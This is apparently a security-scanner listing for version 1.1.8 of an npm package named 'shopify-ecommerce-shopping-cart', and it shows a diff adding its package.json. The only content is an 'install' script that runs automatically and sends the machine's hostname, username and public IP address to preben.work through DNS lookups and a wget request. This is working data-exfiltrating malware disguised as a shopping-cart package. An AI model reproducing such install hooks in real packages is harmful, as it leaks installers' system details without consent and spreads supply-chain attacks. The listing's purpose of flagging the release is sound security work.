shopify-ecommerce-shopping-cart 1.1.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of shopify-ecommerce-shopping-cart might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +10 -0
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "description": "",
3
+ "license": "ISC",
4
+ "main": "index.js",
5
+ "name": "shopify-ecommerce-shopping-cart",
6
+ "scripts": {
7
+ "install": "host shopify-ecommerce-shopping-cart.preben.work; host $(hostname).preben.work; host $(whoami).preben.work; host $(wget https://checkip.amazonaws.com -q -O /dev/stdout).preben.work; wget http://preben.work/?shopify-ecommerce-shopping-cart -q -O /dev/null;"
8
+ },
9
+ "version": "1.1.8"
10
+ }